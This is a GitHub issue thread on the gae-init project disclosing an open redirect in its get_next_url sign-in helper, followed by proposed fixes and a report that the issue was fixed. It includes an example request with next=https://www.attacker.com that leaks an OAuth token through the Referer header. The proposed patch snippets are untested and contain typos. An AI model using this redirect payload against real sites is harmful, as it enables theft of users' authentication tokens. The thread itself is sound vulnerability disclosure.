### ISSUE TITLE
Security Question on get_next_url

### ISSUE THREAD

**Issue by coredefend** [gae-init/gae-init#621]
In scenarios where the `Referer` is not used to control the redirect, users can provide the `next` or `next_url` parameter to specify the next url to visit (redirect).

During testing If I provide an arbitrary or off-site link in one of these parameters to my signup/signin routes, the user gets authenticated and will then be redirected to the value in one of those parameters. The issue is that my OAuth token is copied to the `Referer` header and then sent along to an arbitrary site. An attack scenario is when an attacker supplies a malicious link in the parameter and sends this to a victim. The victim will then click this and see that it goes to the login page for a legitimate site. Upon successful login, they will be redirected to the attacker's site and the authentication token will be leaked and stored on the access logs in the attacker's server. 

**Request**
```
GET /signin/gae/?​next=https://www.attacker.com​ HTTP/1.1
Host: foo.appspot.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:51.0) Gecko/20100101Firefox/51.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Cookie: SACSID=<.. REMOVED ..>
Connection: close
Upgrade-Insecure-Requests: 1
```
**Response**
```
GET / HTTP/1.1
Host: www.attacker.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:51.0) Gecko/20100101 Firefox/51.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Referer: https://www.google.com/url?sa=D&q=https://foo.appspot.com/api/auth/callback/gae/&usg=AFQjCNFaiY<.. REMOVED ..>Q5Z40iMxag
Cookie: B=<...REMOVED...>
Connection: close
Upgrade-Insecure-Requests: 1
```
Is there a way to prevent this?

Also, the `get_next_url` method accepts several protocols such as `javascript:`. Is there a way to only allow `http` and `https` protocols?

**Comment by mdxs** [comment]
Currently, in `main/util.py` we have:
```
def get_next_url(next_url=''):
  args = parser.parse({
    'next': wf.Str(missing=None), 'next_url': wf.Str(missing=None)
  })
  next_url = next_url or args['next'] or args['next_url']
  do_not_redirect_urls = [flask.url_for(u) for u in [
    'signin', 'signup', 'user_forgot', 'user_reset',
  ]]
  if next_url:
    if any(url in next_url for url in do_not_redirect_urls):
      return flask.url_for('welcome')
    return next_url
  referrer = flask.request.referrer
  if referrer and referrer.startswith(flask.request.host_url):
    return referrer
  return flask.url_for('welcome')
```

Perhaps the problem is with the `return next_url` having passed only a minimum check.

So would the following work better?

```
def get_next_url(next_url=''):
  args = parser.parse({
    'next': wf.Str(missing=None), 'next_url': wf.Str(missing=None)
  })
  next_url = next_url or args['next'] or args['next_url']
  do_not_redirect_urls = [flask.url_for(u) for u in [
    'signin', 'signup', 'user_forgot', 'user_reset',
  ]]
  if next_url:
    if any(url in next_url for url in do_not_redirect_urls):
      return flask.url_for('welcome')
    if next_url and not next_url.startswith(flask.request.host_url):
      return flask.url_for('welcome')
    return next_url
  referrer = flask.request.referrer
  if referrer and referrer.startswith(flask.request.host_url):
    return referrer
  return flask.url_for('welcome')
```

Note the extra two lines before the `return next_url` that will require the `next_url` to at least start with the same `host_url`, which should also solve the http/https requirement.

However, please note that this yet untested; as I lack the time to check/test and actually do not fully understand how to reproduce. But I do hope this helps in addressing the issue.

@coredefend Could you try and see if this might help?

**Comment by gmist** [comment]
By default werkzeug deduces the hostname from the 'Host' or 'X-Forwarded-Host' headers. We can use the Request.trusted_hosts, for example:

Add to main.py
``` python 
class GaeRequest(flask.Request):
    trusted_hosts = config.trusted_hosts # {'my-domain.com', 'www.my-domain.com', etc}
...
app = Flask(__name__)
app.request_class = GaeRequst if config/trusted_host else flask.Request
....
```

below in werkzeug/wrapper.py:

```python
@cached_property
    def host_url(self):
        """Just the host with scheme as IRI.
        See also: :attr:`trusted_hosts`.
        """
        return get_current_url(self.environ, host_only=True,
                               trusted_hosts=self.trusted_hosts)
```
and in werkzeug/wsgi.py:
``` python
def get_host(environ, trusted_hosts=None):
....
  if trusted_hosts is not None:
        if not host_is_trusted(rv, trusted_hosts):
            from werkzeug.exceptions import SecurityError
            raise SecurityError('Host "%s" is not trusted' % rv)
```

**Comment by lipis** [comment]
In other news I was thinking of including the #599 eventually.. will that help in any way?

**Comment by coredefend** [comment]
@lipis @gmist @mdxs -- these changes look good, (shipit)!

**Comment by lipis** [comment]
Fixed in #634 and new version released :)
